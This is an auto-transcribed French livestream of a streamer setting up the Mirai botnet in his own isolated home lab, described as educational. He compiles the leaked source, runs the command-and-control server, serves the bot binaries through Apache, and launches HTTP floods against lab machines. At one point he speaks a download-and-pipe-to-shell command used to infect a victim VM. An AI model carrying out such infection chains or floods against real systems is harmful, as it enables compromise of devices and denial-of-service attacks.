Bonsoir et bienvenue pour le stream de ce soir. On renoue ces jeudis, donc cybersécu, on va avancer sur le botnet Mirai. On n'entend pas ton micro. Pardon? On n'entend pas ton micro. Est-ce qu'on entend mieux là? Non, c'est très bas en fait, le micro par rapport à la musique. Alors, visiblement, il y a des petits soucis de son. Voyons voir ça. Qu'est-ce qui se passe si j'augmente? Est-ce que c'est mieux comme ça? Est-ce que c'est mieux? Est-ce qu'on entend mieux, plus fort, moins fort? Je sais que pour le moment, il n'y a pas encore grand, grand monde. Ceci. Je vais regarder sur mon téléphone voir ce que ça donne. Je vais. Hop, peut-être rapprocher le micro, ce sera déjà pas mal déjà. Et vérifier qu'il est bien. Rapprocher le micro. Ah bah c'est bon. Ça a l'air mieux. Hop là, bon. Eh ben il suffisait juste que j'augmente un peu le gain et que je rapproche le micro. Tiens, je vais peut-être d'ailleurs baisser un petit peu ça. Hop. Ouais, bon, on le verra quand même. C'est pas grave. Bien, bien, bien. Eh ben j'espère que ça va bien pour tout le monde. Et donc, comme je venais de le dire, ce soir, on est jeudi, et comme tous les jeudis depuis maintenant 2-3 épisodes, eh bien, on va aller faire du botnet. Alors, petit résumé d'abord. On va se mettre comme ça. Voilà, là c'est bien. Voilà, petit résumé de là où on en était avant. L'objectif initial. On a ici plein de machines virtuelles qui sont dites vulnérables. Et j'ai installé deux machines dont leur but va être de pouvoir prendre le contrôle de ces machines vulnérables et de leur faire faire ce qu'on veut. Et donc de créer dans mon HobLab un botnet, c'est-à-dire un ensemble de machines compromises et qui donc répondront aux ordres que je pourrais leur envoyer. Depuis cette machine-là, la machine Mirai 1. Et la raison pour laquelle je l'ai appelée Mirai 1, c'est parce que en fait, on va utiliser le code source du botnet Mirai, justement. Alors, qu'est-ce qu'il avait de particulier, ce botnet? C'est qu'en fait, il a commencé à se constituer de machines qui étaient faciles à compromettre pour une raison très simple, c'est qu'elles avaient des identifiants d'accès par défaut. Genre admin, route, route, admin 1, 2, 3, 4, ce genre de choses-là. Et accessible en telnet en plus. Donc, lors du premier épisode, j'avais mis en place toutes les machines vulnérables. On avait fait du clonage, on avait fait, je crois, 37 VM. Et puis, lors du deuxième épisode, sur ces deux machines-là, j'avais commencé à compiler le code source de Mirai. D'ailleurs, encore merci à Corben pour le coup de main sur le code C. Et malheureusement, on était resté un peu sur notre fin la fois précédente. Parce que le code avait compilé, il y a un truc qui se lançait, mais à quoi ça servait, comment c'était? C'était pas forcément super super bien indiqué dans la documentation. Et ça, c'était un peu ennuyeux. Entre-temps, j'ai fait un petit peu de recherche. Et je me suis rendu compte qu'il y avait d'autres personnes qui avaient repris le code source de Mirai et qui avaient essayé d'en faire un truc un petit peu plus, entre guillemets, facile à mettre en œuvre. Toujours, bien entendu, dans un but éducatif. Hop. Alors là, on peut voir que j'ai déjà un vague truc qui tourne. Mais je vais le quitter. Hop. Exit. Mais je veux quitter. Voilà. Alors, ce que je vais faire, c'est d'ailleurs quitter ça. Puisque c'était donc mes tests. Hop. Voilà. Et ce que je voudrais vous montrer, c'est l'autre site
sur lequel je suis tombé. Hop. Et c'est celui-ci, donc. Voilà. Et le truc propose un setup. Alors, c'est pas parfait non plus. Il y a les mêmes modifications de code C à faire que la semaine dernière. Mais ça a l'air déjà un petit peu plus utilisable. Je vais tout de suite le mettre dans le chat de ce soir. Hop. Et le mettre aussi, si je remets la main dessus, dans le Discord du serveur. Hop, allons-y dans les liens du live. On va mettre ça. Hop. Voilà, qui est fait. Et on va pouvoir continuer. Donc, le truc précise que ce qu'il faut, c'est avoir un working pi-hole setup. En gros, moi, de ce que j'ai lu, alors je n'ai pas de pi-hole sur mon home lab, ça pourrait être une idée d'en mettre un jour pour, entre guillemets, pour le fun. Mais en fait, ce qui est important, c'est en fait d'avoir un réseau dans lequel on peut créer soi-même des enregistrements DNS. Donc comme ça, on peut personnaliser son... l'hôte vers lequel le botnet Mirai va se connecter pour le centre de commande et contrôle. Alors, une Ubuntu, une Debian, ça c'est bon, on a. Et la copie du code source de Mirai, bah, c'est justement ce dépôt que j'ai d'ores et déjà cloné. Si je fais un git status, alors on va peut-être voir qu'il y a des modifs. Mais si je vais si je vais plutôt faire ça, point git, puis quand on est dans la config, on voit bien que c'est le bon repo que j'ai cloné. Ensuite, donc le but, voilà, c'est exactement la même chose que ce que je veux faire, c'est vraiment, d'ailleurs je vais zoomer un peu, le but c'est vraiment de faire un petit setup Mirai et de le faire dans un environnement local. Et bien entendu, lui, il met un petit disclaimer, je vais dire la même chose, hein. C'est vraiment ici à but éducatif, le but c'est vraiment d'être dans un lab, de comprendre comment ça fonctionne, de s'amuser à compromettre des machines qu'on contrôle de toute façon, et qui sont jetables, et pas d'aller, d'aller taper sur internet. De toute façon, si je tapais sur internet depuis mon home lab, je pense que je me ferais de toute façon griller par mon fournisseur d'accès, hein. Bien, ensuite la partie installation des packages, bon globalement c'est... Alors ce qui est assez intéressant par rapport au lien de la semaine dernière, c'est que... alors bon moi j'ai pas installé Screen, hein, j'ai préféré utiliser Tmux, mais on a Apache dans la liste des dépendances. Et puis il y a des outils supplémentaires qui sont prévus ici. Et quand on va se balader un petit peu... et qu'on va donc dans Tools, et qu'on va regarder le compilers.sh, ce qui est assez amusant, c'est qu'on voit qu'en fait, le truc va télécharger sur le site de uclipse.org carrément des binaires de cross-compilation. Et ensuite, il les décompresse, il les ajoute, et c'est parti. Donc si je regarde l'état de mon point bash rc normalement, hop, ah bah tiens, d'ailleurs il a rien rajouté, c'est assez amusant. Je pense que c'est parce qu'il fait ça en sudo à un moment, donc ça se trouve c'est dans le home de root. Hop là. Voilà, c'est ça, voilà, il va améliorer la... Et donc je pense que c'est aussi pour ça que j'ai dû avoir des soucis. Je pense que dans le tutoriel, il a dû s'en mêler les pinceaux, j'avais eu des petits soucis de d'environnement Go et de... $pass/etc/xcompile. Ouais, je suis pas sûr qu'il est vraiment tout bien... mais c'est pas grave. Alors... revenons donc
à notre code. Donc, on peut ensuite faire une première compilation. Ensuite, création de la base de données, comme on l'avait fait la semaine dernière, avec un restart de MySQL. Et alors, ce qui est assez intéressant avec ce dépôt-là, c'est qu'il semble avoir créé un petit outil en Python qui va permettre justement de reparamétrer soi-même le domaine et le serveur DNS. Donc j'étais allé les modifier moi-même dans le code source la semaine dernière en me demandant si c'était pas aussi ailleurs. Là, a priori, si je vais dans le code qui est là et que je fais un vi sur setup.py, c'est assez intéressant parce qu'en fait, voilà, il va lui-même lancer les outils de debug, ce genre de choses-là. Et il va aller modifier justement les headers qui vont bien. Avec une petite interface. On va la relancer d'ailleurs, tiens, cette interface, enfin ce script. Alors, est-ce qu'il faut le faire en tant que sudo ou pas? Non. Donc, je fais un Python 3, hop là, setup.py. Et puis, voilà, il propose et il y a tout de suite un petit outil, une boîte de dialogue qui dit, bon bah, alors, en l'occurrence, on peut voir que moi, j'avais déjà prévu en préambule à l'essai de compilation, j'avais déjà dit, bon bah, je vais laisser le truc par défaut et je vais lui donner une adresse IP locale. Et puis, je sais que j'ai mon serveur DNS. Donc, tout ça, ça avait été mis dans mon DNS local. Si on se rappelle bien, je vais vous remontrer sur le schéma. On prend le schéma, hop, je remonte. Et ici, donc, dans mon labo virtuel, j'ai un serveur DNS. Donc, bon, je peux le laisser comme ça. Là, bon, il repropose la valeur par défaut qui est le DNS de Google. Je vais bien sûr lui remettre 10.0.53 qui est mon DNS, mon serveur DNS. Voilà, save config, yes. Puis là, petit contrôle L pour renettoyer le terminal. Si je reviens ensuite, il dit, ensuite, on va le compiler une deuxième fois. Et la raison pour laquelle on le compile deux fois, en fait, c'est que la première compilation permet de construire l'outil qui sera appelé dans le setup.py. Donc, hop. Alors, ça c'est lequel? Non, ça c'est celui de la semaine dernière. Hop. Donc, on avait dit qu'on faisait un. Poum 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 poum. Bash build.sh debug telnet. Hop. Bash.slash build.sh debug telnet. Hop. On va même se payer le luxe de le faire. Ouais, c'est cool. Si je refais ça, voilà. Donc là, on est bon, ça a dû fonctionner. Hop. Bien. Donc maintenant, on peut le lancer. Alors, lui, ce qu'il fait, c'est que donc il va dans le répertoire debug, et ensuite, il va utiliser la commande screen. Alors, comme je suis déjà dans un TMUX, j'en ai pas forcément besoin, et il y a juste à faire un sudo.cnc. Allons-y. Dans le répertoire debug, alors. Hop. Voilà. Donc là, il ouvre la DB MySQL. Ensuite. Et pour lancer un bot, sudo.slash mirai.debug. Alors. Mirai. Non. Hop là. Bonsoir, Jalador. Eh bien, je suis en train de continuer mon projet botnet. Et donc, je cherche à avoir une instance du botnet Mirai qui tourne dans mon home lab. Et j'espère que cette fois-ci, ce sera un petit peu plus. Comment dire, un petit peu. Avec un peu plus de succès que la semaine dernière. D'ailleurs, bonsoir, hein, Jalador. Merci de nous rejoindre. Hop, alors, qu'est-ce qu'on a ici? On a dit le mirai.dbg, donc il faut que j'aille dans le debug. Hop là. On avait dit sudo, je crois, ou sans sudo?
sudo mirai.dbg. Hop. Debug mode. Voilà. Et ensuite, on peut se connecter en faisant un telnet à l'outil de commande et contrôle. Alors, hop. Alors là, ce qui est assez marrant, c'est qu'il affiche des trucs en russe. J'ai aucune idée de ce que ça veut dire. Ça a l'air d'être plutôt pas mal. Et ensuite, ce que propose le README, c'est de dire, tiens, au fait, il y a un mode head. Hop. Et on a a priori une liste d'attaques. Donc on pourra potentiellement même lancer des attaques. Ce qui est assez étonnant, c'est que je... Le truc est assez limité, entre guillemets, même si il y a déjà un bon paquet d'attaques. Je me demandais s'il n'y aurait pas eu moyen de genre pouvoir lancer des commandes custom. Mais bon, déjà, on va bien voir. Alors, but wait, there is more. Ah, ça m'intéresse. Donc, on peut faire la partie binaire, alors. Donc, a priori, ça a été déjà. Hop. On peut aller dans le Mirai. Release ou pas, non. Bash release telnet. Allez. Voilà. Alors. Ah oui, il les a pas parce que effectivement c'est dans le bash RC de route. On va faire, ce qu'on va pas s'embêter, on va prendre tout ça. Ah mais je l'ai fait deux fois en plus. Ouais, je l'ai fait deux fois. C'était pas très malin. Hop, copier la sélection. Hop, on va le rajouter là. On quitte le shell. Là, on le quitte aussi. On en crée un nouveau. Non, toujours pas. Ah oui, parce qu'il essaye de les remove, mais il n'y en a pas. Ok. Ok, ça c'est cool. Et maintenant, on peut installer les binaires dans Apache 2. Alors, cd release. Ça faut aussi, ça fait partie des modifs que... Enfin, je sais plus si je l'ai dit tout à l'heure, mais... C'est vrai que ce dépôt-là par rapport au précédent me fait installer Apache. Sudo bash.slash apache2.sh. Alors déjà, on va peut-être jeter un œil au code. Apache2.sh. Qu'est-ce qu'il fait? Il fait un mkd, il fait un cp de tout ça. Il fait un cp des binaires. Ah, donc on va peut-être jeter un œil. Ouais, j'ai pas grand-chose de compilé. Alors, rm-rf, release. Parce que j'avais fait un peu la même chose que la semaine dernière. C'est dans le build.sh où je lui avais dit « Oh, va pas me compiler tout pour des archis dont je me fiche. » Mais maintenant que j'ai les cross-compilers qui sont installés, enfin les compilateurs, hop, les cross-compilers en anglais. Hop, on va remettre ça. Voilà, ça, c'est bon. Voilà. Donc normalement, ça devrait le faire. Si je relance le build.sh, alors. Non. Build.sh. Build.sh. On va faire release. Telnet. Ah voilà, et il les compile tous. Ah alors là, je peux vous dire que je suis content. Je suis super content. Là, ça va être la fête. Là, je vous le dis, on va s'amuser. Je le sens bien ce soir. Je devrais peut-être pas crier victoire trop tôt, mais je me sens dans une vague un peu plus positive. Donc, positivons, on y croit. Ce soir, on fera peut-être tourner Mirai.
Et même si on n'y arrive pas, c'est pas grave. Parce que je trouve que déjà, j'avance mieux que la semaine dernière. Donc ça, c'est cool. Il a compilé les trucs. Je vais tenter en SSH, voir s'il compile les trucs en plus. Ouais, non, il fait la même. Mais je suis content. On a le X86. On a le X86, donc on va pouvoir poncer une ou deux boxes que j'ai dans le lab. Qu'est-ce qu'il nous dit sinon ensuite? Donc ah oui, le Apache2.sh. Est-ce qu'on peut pas déjà jeter un œil à ce truc? Hop. Il est là. Ça y était pas présent, je pense, hein, dans le code source de l'autre là. On va regarder ça tout de suite. Non, il n'y était pas. Hein. Il y avait des scripts. Cross-compile, ouais, bon, ouais. Je pense que en fait, le truc d'origine, le truc que j'avais vu, le leak d'origine, en fait, il était un peu incomplet et ça se trouve, c'était volontaire pour éviter que n'importe quel premier venu puisse tout de suite, j'ai envie de dire, mettre en place son botnet et pirater encore plus de monde. Ok, donc l'IP du serveur web. Tac, tac, tac. Je pense qu'il faudrait peut-être que je vérifie d'abord si j'ai un Apache qui tourne sur... alors... Sur cette IP là, normalement j'ai installé Apache, donc ça se trouve il tourne déjà. Ouais, voilà, il tourne. Il tourne et il dit var www.html. Donc a priori, en créant un répertoire bins, il va pouvoir tout copier dedans, ce sera bon. Ok. Donc allons-y. Allons-y voir. Hop, non, pas lui. Lui. Donc là, il a tout compilé. Hop. Et allons voir dans le répertoire release. D'ailleurs, tiens, il va falloir que je remodifie encore cette... Hop. Voilà. Comme ça, on est bien. On voit tout. C'est un truc que j'oublie un peu souvent d'ailleurs, hein, le coup de l'overlay qui est juste là. Et... Des fois, je l'oublie un peu et je me mets à taper les commandes et en fait, vous les voyez pas. C'est un peu dommage. Bref, donc là, a priori, on a plein de trucs. Donc si je fais un file sur mirail.étoile, tiens, file, mirail.étoile, no such file. Ah oui, c'est parce que je suis pas dans le répertoire release. Mirail, on dirait mirail.étoile. Oula, il fait beaucoup de choses. Voilà, donc on a un elf 32 bits pour ARM, un autre pour ARM aussi, ARM, EABI 4, EABI 5, Motorola 68000, MIPS. Ok, très bien, c'est cool. Donc maintenant, normalement, je peux faire le point slash à page 2. Oh yeah. Les trucs n'ont pas le bit d'exécution qui est actif, donc à chaque fois faut lancer bash point slash, c'est ce qu'il me disait de faire, hein. Hop. Hop. Ouais, c'est parce qu'en fait une fois qu'on est dans le répertoire release, ok, hop là, et en fait il le fait en sudo, hop, pour avoir les droits de cette sudo bash point point slash apache2.sh. Hop. Web server IP, ben ce sera celle-ci. Hop. On va aller regarder ce qu'il y a dedans maintenant. Donc on a bien un répertoire bins. Et dans ce répertoire bins, on a bien tous les binaires qu'on a compilés qui sont présents. Et on a un petit script shell. On va jeter un œil à ce qu'il y a dedans. Hop.
Et là, bah, c'est exactement ce qu'on a vu. Voilà, parfait. Nickel. Le seul truc qui manque, c'est... Ah oui, donc le binary des VRLP. Ok, donc en fait, selon le binaire qui va être mis en place... il va ensuite l'appeler dans tous les cas DVR Helper. Il va lui donner des droits d'exécution assez... enfin, je dirais même des droits assez... ouais, 777, c'est... Vas-y, c'est YOLO pour tout le monde. Vas-y, c'est la fête, open bar, tout le monde peut y toucher. J'aurais peut-être mis en 555, perso, mais bon. Ensuite, ouais, il lance le truc. Ok, très bien. Hop. Alors normalement le point slash CNC je l'ai déjà. Hein. Hop là, on va revenir ici. Et voilà, le point slash CNC je l'ai déjà, mais sauf que je suis en version debug. À la limite, je peux peut-être le laisser en version debug. Hein. Et ensuite, ce qu'on va pouvoir faire ici, c'est faire un curl http 2. Slash slash ça slash bins slash bins.sh on fait pipe sh curl commande sérieux j'ai pas curl là-dessus voilà. Exact format error. Alors, pourquoi ? Parce qu'il l'a pris en arme. Tiens, c'est marrant ça, il l'a pris en arme. Il l'a pris en arme. Pourquoi est-ce qu'il l'a pris en arme ? Pourquoi est-ce qu'il l'a pris en arme ? Pourtant, il y a bien un Mirai. Donc, for binary in dollar binaries, do wget chmod 777 dvr helper. Donc, c'est-à-dire qu'il l'a fait x fois. Alors, ce qu'on va faire, c'est qu'on va recommencer. Ouais, hop. Voilà. Ce que je vais peut-être faire, c'est que je vais faire mkdir. Parce que ça, c'était les vieux trucs. On va faire un mkdir old. Mv. On va enlever tout ça dans old. Bon, ça, on va le garder, on sait jamais. Hop, ensuite. Ensuite, on va revenir sur ce petit curl. T'es où ? Voilà. Exec format error, exec format error. Ah, donc en fait, il a réussi à en exécuter aucun. On va recommencer. Ce qu'on va faire, c'est qu'on va lancer la commande script. Ah, si je l'ai, ouais, script. Voilà. Non, je l'ai pas. Bon. Alors, la commande script, si jamais vous la connaissez pas, c'est assez sympa. C'est qu'en gros, une fois qu'on a lancé la commande script, tout ce qu'on va taper et tout ce qui va être affiché dans le terminal va être logué dans un fichier qui par défaut s'appelle TypeScript. Donc je reprends la petite commande qui est là. Hop,
marqueur là, HTTP, hop là, HTTP. Alors, ce qui est un peu ennuyeux avec la commande script, c'est que vous voyez, là, je me suis trompé et j'ai fait des barres d'espace. Enfin, pas des barres d'espace, j'ai fait des backspace. Et en fait, on va voir dans le fichier TypeScript après que j'aurai effectivement mon erreur et on verra des caractères de contrôle qui correspondent au backspace. c'est assez amusant. Donc, 10 points, je me rappelle plus de l'IP. Je me rappelle plus de l'IP. Host CNC. Non. C'est lequel? Si, c'est changeme.com. Hein. CNC.changeme.com. Voilà. 10.5.0.11. Hop. Voilà. /bins/bins. .sh, on fait pipe sh. Ah, là, il se traîne un peu quand même. On dirait qu'il a. Mais. Ah oui, si. Il a fait ça. Ah. Donc, alors, ce qui est intéressant, c'est qu'en fait, donc, il va lancer tous les formats qu'il peut. Mais quand il réussit, c'est pas pour autant qu'il va pas continuer. Enfin, même s'il a réussi, il va continuer à faire les autres. Donc, maintenant, qu'est-ce qu'on a ici? Deleted client 1. Ah, je commence à avoir des trucs. Alors là, je suis dans quoi? Là, je suis dans le truc de debug. Alors, qu'est-ce que j'ai comme commande? DNS Resolver Flood. Stomp. Alors, ce qui m'ennuie, c'est que ce que je ne trouve pas là-dedans. Parce que là, ok, j'ai mon truc de commande et contrôle, mais en fait, à quel moment est-ce que je vais avoir un premier truc qui va me permettre d'aller me constituer mon botnet en fait. Parce que là il me dit en bas il me dit un bot connected. Il fait quoi ce truc? Alors, c'est quoi la suite? Parce que oui, je charge Mirai sur un périssien. Bon. Là, on va pouvoir commencer un peu faire des trucs un petit peu plus amusants, je pense. Donc là, j'ai des choses qui sont intéressantes, peut-être. Alors. J'avais pas un truc loader. Je sais que dans le. J'avais un truc qui s'appelait loader. Alors. Botscanner.c. Single load. Comment est-ce que je peux faire? Ça, c'est juste le truc. Si je fais HTTP, qu'est-ce qu'il me dit? Hop. Must specify prefix. Donc, si je fais HTTP. Qu'est-ce que j'ai dans mon home lab comme serveur web? Hop là.
Ah oui, je dois avoir le 10. Ah, si je fais... si je fais www.example.com. HTTP is not a valid attack. Ah, specify prefix slash netmask. Ah, donc en fait, je fais HTTP, je fais 10. Ah, zut. Hop là. Je fais HTTP 10.2.1.2. Me specify une attaque duration. 10.2.1.2, puis on mettre 1. Ça passe pas. Enfin, le truc ne me dit plus rien. Donc c'est un peu dommage. Mais c'est pas grave. C'est pas grave. Je tapote un petit peu partout où je peux. Hein. Ah, si, là j'ai un truc dans le debug. Il me dit starting attack. Je vais quand même jeter un œil. Hop. Je vais me connecter sur mon petit Marvin. Ça load, hein. Ça load. Pas beaucoup, en fait. Par contre, qu'est-ce qu'on a ici? Je lui dis quoi comme attaque? 10-2-1-2, non? Je lui dis 10-2-1-2. Alors, 10-2-1-2, c'est censé être... Alors, si je regarde plutôt ici et que je fais un host example.com, c'est 10.2.1.3. Si je tape, c'était quoi? Vhost 10.2.1.3. Hop. Si je vais sur... non, en fait, je vais peut-être aller plutôt... directement sur le Vhost, ouais, website workstation, tiens, voilà, là ça va être bien. Je pense que il faut que je me mette à retrouver le peut-être le DNS carrément, en fait, pas forcément la workstation. Hop, viens reparler le DNS, t'es où? Debian DNS, voilà. Hop, et si je fais un cas de TC host, ouais, bon, d'accord. Laisse plutôt slash TC host. Voilà. Et le 10.2.1.2. Le 10.2.1.2, il correspond à rien, en fait. Je l'ai pas utilisé. C'était le 10.2.1.3 qu'il aurait fallu que je mette. Ok, allons-y. Donc, si je refais mon truc là, et puis que je fais HTTP 10.2.1.2. 10, ah punaise, HTTP 10.2.1.3, je fais 10 par exemple, là il me dit received from CNC starting attack, là j'ai rien d'autre. Hop, on va pouvoir aller jeter un œil. Qu'est-ce que j'ai fait du... hop, voilà, website workstation, et que je vais dans ce truc là allez, lance-toi petit terminal, courage, la machine est normalement pas à genoux, hein. Y a pas de raison que ça passe pas. Oui, hop, allez, voilà. Ce serait laquelle, la 10.2.1.3? La 10.2.1.3, ce serait... ouais, ce serait peut-être le 10.13.37.43. C'est un DVWA. Alors. Oula, c'est tout ce qu'il y a dedans. Conf available. Ce serait du Nginx? C'est du Nginx, oui. Ah bah oui, mais c'est celui sur lequel j'avais fait toutes les tous les DVWA avec Naxi aussi. Donc oui, fatalement, c'est du Nginx.
Site available. Voilà. Je regarde le DVWA. Toute la conf. Et j'avais carrément mis default server. Ok. Donc normalement. Donc allons voir. Je dois avoir. Si je fais un pgrep nginx, je dois avoir nginx qui est là. Ok. Var log. Là-dedans, il n'y a pas grand-chose. Donc, si ça se trouve, j'avais tout mis dans slash SRV. Allons-y. Allez, il y a un répertoire log. Donc, on est le 11 novembre. Et là, j'ai pas grand-chose en termes d'accès. On est d'accord que le site marche toujours. On va vérifier ça tout de suite. Tiens, ce serait un peu dommage si jamais le botnet marche pas. Ce qui est une possibilité, hein. On n'est pas à l'abri que ça. Que ce soit un peu tout. Alors, ça on s'en fiche, ça on s'en fiche. Ouais, vas-y, restaure-moi la session. Alors. Ça c'était le 2, c'est pas grave. Lui par contre c'était le premier. Oui, donc il marche toujours. Et si maintenant je fais ça, je vois bien que j'ai eu des accès. Donc voilà, j'ai eu des accès, ça c'est cool. Donc, si je relance ça et que je fais HTTP 10.2.1.3, puis que je fais 60. Je sais pas si c'est un nombre de secondes ou de minutes. Il me dit juste une attack duration. Ouais, non, j'ai rien. Ah, flûte. Voilà. Donc là, ça c'est l'IP de ma station de travail, mais c'est pas l'IP du botnet. Donc c'est un peu ennuyeux. Mais c'est quand même bizarre, HTTP flood pourtant. Après, il m'a fait deux fois deleted client. Je sais pas si je relance le truc. Attends, faire un RM de DVR. Voilà. J'ai du mal à comprendre. We are running out of. Ok, memory scanning process. Alors la question que je me pose, c'est est-ce que je pourrais pas faire un TCP dump. En fait, ce que je voudrais faire, c'est vérifier si le botnet effectivement communique avec déjà le CNC, enfin en tout cas la machine compromise. Donc, déjà si je fais un IPA, j'ai qu'une IP, ok, sudo TCP dump moins N. Moins INP1S0. Donc là, ok, j'ai plein de trucs, normal. Et puis je mets host 10.5.0.11. C'est marrant, c'est lui qui
qui renvoie des choses. Et si je fais... Si je relance ça... Est-ce qu'il fait un truc tout de suite? Ouais, il a fait un truc tout de suite. ARP, bon, on s'en fiche. Et si je vais sur mon autre VM, là, non, rien, toujours rien. Pas très efficace le truc. Pas très efficace. Bon. On va peut-être essayer au moins de compromettre d'autres machines, non ? C'est aussi ça que je cherchais à voir s'il y a moyen d'étendre notre botnet. Ça c'est le readme, ouais. Parce que donc en fait, si je récapitule, quand on lance le truc et qu'il lance point slash dvr helper. Alors, je suis un peu embêté, je sais pas trop où, je sais pas trop par où chercher pour le moment. Client list, constant, database, main. Voyons voir ce qu'il y a là-dedans. Ouais, non. Oh, attends, j'avais fait un git grep loader tout à l'heure. Scanner.c, single load. Où est-ce que j'avais eu... Je vais retourner voir l'ancien code. Parce que l'ancien code, à un moment... Ouais, c'est bien celui-ci. Mais ça, c'est... D'accord, d'où le fait d'aller voir forum.md, d'avoir la préface, requirements, ok. Oui, parce que normalement, il y avait une machine pour le loading. Basically bot brute results send it to server listening with scan listen utility. Ah, donc il faut peut-être que je prenne le scan listen utility. Et alors il est où? Là j'ai rien. Ah si, j'ai le scan listen. Donc si je fais un point slash release scan listen, il me dit bind address already in use. Si je fais un sudo netstat -n, ah oui, voilà, non plus, quarante-huit cent, ok. Et donc on a dit 48 101. J'ai oublié le grep. Donc on a bien un truc. Alors,
Alors, voyons voir ça. Name. Commande. Voilà. Bizarre ça. Alors si je vire ce truc là, qui est censé être le debug, et que je relance, il est où le loader? Voilà, Scanlisten. Voilà. Et je vais relancer mon binu ici. Alors, on va effacer déjà ça. Eh, hey, salut nos screenfound. Mais c'est pas grave, tu arrives quand tu arrives, il n'y a pas de souci. J'espère que tu as passé une bonne journée. Que tu as bien profité du jour férié. Alors... Ok, donc là, bah, fatalement, il s'est encore gaufré parce que bah, il a tenté tous les autres. Maintenant, qu'est-ce qu'il me raconte? Ça, on s'en fiche pour le moment. C'est le scan listen, il ne fait rien d'autre. Listen. Si je suis un LSOF, il est où? Est-ce que scan listen, il listen quelque chose? Ouais, il listen sur le 4801. Ok, j'ai pas un iptable qui traîne, j'espère. Non, j'ai pas la commande iptable. Est-ce que j'aurais pas un NF table? Si j'ai un lib NF table, j'ai un NF table. Alors. Là, je suis en train de me demander est-ce que effectivement j'aurais pas est-ce que j'aurais pas un firewall qui Donc, a priori le service s'appelle nftables aussi. Systemctl status nftables. Il est loaded, mais il est disable, active, inactive, dead. Donc a priori, j'ai pas de firewall. Ok, soit. Ouais, non, il fait rien d'autre. C'est chelou. Alors maintenant que j'ai un scan listen, est-ce que ça marche mieux si je lance ça à nouveau? Ça a pas l'air très Et là je suppose que alors lui hop il sait plus où il est. Non, toujours rien. Salut Johnny Livingstone, c'est gentil même si tu passes en coup de vent, merci beaucoup.
J'espère que tu as passé une bonne journée. Tu as bien profité de ton jour férié. Pendant ce temps, on essaye de faire tourner ce botnet. Qui n'a pas l'air ni de pouvoir aller compromettre d'autres machines. Ni de lancer une attaque quelle qu'elle soit. Ce qui est un peu dommage quand même. Alors, par où est-ce qu'on pourrait avancer ? Ah mince ! Ça change pas grand-chose. Bon, j'espère que la journée était bonne quand même. Eh bien, le programme aujourd'hui, c'est d'essayer de faire fonctionner un botnet dans mon lab. Donc, j'essaye de faire fonctionner le botnet Mirai. Alors bon, ça, tout compilé, ça finit par fonctionner. Maintenant, la question, c'est comment assembler tous les bouts ensemble. Est-ce qu'il m'a mis le loader là, la question est. Est-ce que finalement je l'ai buildé le loader? Là j'ai rien. Là j'ai un scan listen. En fait j'ai l'impression que. Alors, attends, pour builder le echo loader. Build.sh. Alors, il est. Quand j'avais fait mon build.sh, alors. Build.sh. En fait, je pense que le truc que j'ai récupéré, il est pas terminé non plus. Donc je vais tenter d'aller utiliser le loader de l'autre truc. Donc si je tente un... Alors il disait de faire comment ? 4 file.txt, hop. Fail to load from bins folder. Alors, si je vais dans hold et que je tente plutôt un 4..host.txt /hold/loader. Non, justement, ..loader. Donc il en a processé un. On va aller se connecter sur cette machine là, on va voir ce que ça donne. Hop, on va voir ce que ça donne. J'avais pas fait ça ? Je me demande si j'avais pas mis un... Hop, normalement route c'est censé passer. Voilà, donc je suis sur une victime Debian. Qu'est-ce que tu me racontes? C'est un level bien au-dessus de moi, le seul truc que je vois c'est Ulimit. C'est-à-dire, tu es perdu nos screen farm, c'est ça? T'as du mal à suivre. J'ai rien eu dans le tile-f var log house.log. Remember to ulimit.
Ah, tu vois rien en dessous? Ah, tu veux dire que toutes les commandes qui sont là en dessous, tu les piches pas? Alors, normalement, j'ai un telnet hein, là-dessus. Je crois que j'avais réussi à me connecter en telnet, non? Je crois que j'avais mis telnet hein, sur les Debian. Ouais, hop. Toum. Tiens, je crois que je me suis trompé dans le mot de passe. Failed password for root run 10.1.10.5. Alors, attends, celle-ci elle a quoi comme IP? 10.5.0.12. Et alors la question c'est est-ce que dans lui là, non, il a pas, il a 10.5.0.12 dans le botnet, mais il a rien d'autre. Alors. Donc là, l'envie.sh, hein, si je recherche la chaîne loader, j'ai rien. Alors, je vais tenter d'aller voir dans l'autre code. Ah, dans l'autre code, j'avais un répertoire loader en fait. Et là, j'ai rien. Voilà, donc je pense qu'en fait, il est pas complet son truc. C'est dommage. Mais pourtant, je pense que j'ai déjà un bon début. Donc si ça se trouve, en allant là-dedans. GCC, ouais, donc alors attends, il est censé faire quoi? Il est censé se connecter à un truc, ça. Attends, headers, telnet, underscore info. Sauf que là, j'ai. Ah si. SRC, headers, telnet, info.h. Ouais, donc normalement, le truc, il devrait. Je vais essayer de rajouter des trucs dans le. Je vais essayer de rajouter des trucs dans le host.txt. Hein. Hop. 13. 14. 15. Non, 15. Hop. 116. Et 117. Donc si je fais un cat point point slash host.txt, ok, pipe point slash loader, en sachant que j'ai un répertoire bins, est-ce que tout est exécutable là-dedans? Oui. Et si j'exécute directement le dlr.x86, tiens, pour voir. Mirai, segfault. Bah mince alors!
Isekfault et j'ai un DVR helper qui est là-dedans et qui fait rien. Ok. J'ai des DLR point quelque chose. Alors si jamais je vais ailleurs. Ouais mais alors attends, je suis en train de penser à un truc là. Si je vais là et que je vais dans le répertoire loader. J'ai un répertoire bins. Si je fais un .slash build.sh, il va chouiner. Debug. Ouais, c'est juste qu'il rajoute un moins des debugs. Ok, allez, .slash build.sh. Hein, il chouine. Ah, c'est peut-être ça en fait. Et pourtant, il m'a buildé bien un loader. Warning, implicite déclaration de la fonction close. Did you mean pclose? Dans la fonction util trim, déclaration implicite de la fonction isSpace. Est-ce qu'on va devoir redébugger du C ce soir? Je pense qu'en fait il doit manquer des headers dans les codes. Hein. Parce que donc, dans le src utile, si je vais ligne 161, donc il cherche la fonction isSpace. Délimitation. Ah, tu penses que c'est un problème de ulimit. Pour toi, t'es vraiment... ETC Security. Alors, après, ce qui se passe, c'est qu'on est sur une machine en système D. Hop là, allons-y. Tu fais des fixettes. Ouais, bon, on sait jamais, hein. Je. Attends, c'est bien celui-là. ETC Security Limits.conf ou ETC Security Limits.d. ETC security limits.d. Donc là j'ai rien. Si j'utilise la commande ulimit, je suis en unlimited. Je vais retenter le build.sh. Ok. Alors, oh là oui, laisse-moi un grand air dans ces cas-là, voilà, mieux. Il me dit quoi? Déjà dans le binary.c, il me dit return with no value in function returning non-void. On va peut-être essayer de corriger le code alors. Mais c'est bizarre comment j'avais fait pour compiler et réussir à avoir mon répertoire bin. À moins que. Non, je pense que je vais tenter de corriger le code en fait. Ouais, non, attends, je vais quand même pas me taper. Il nous 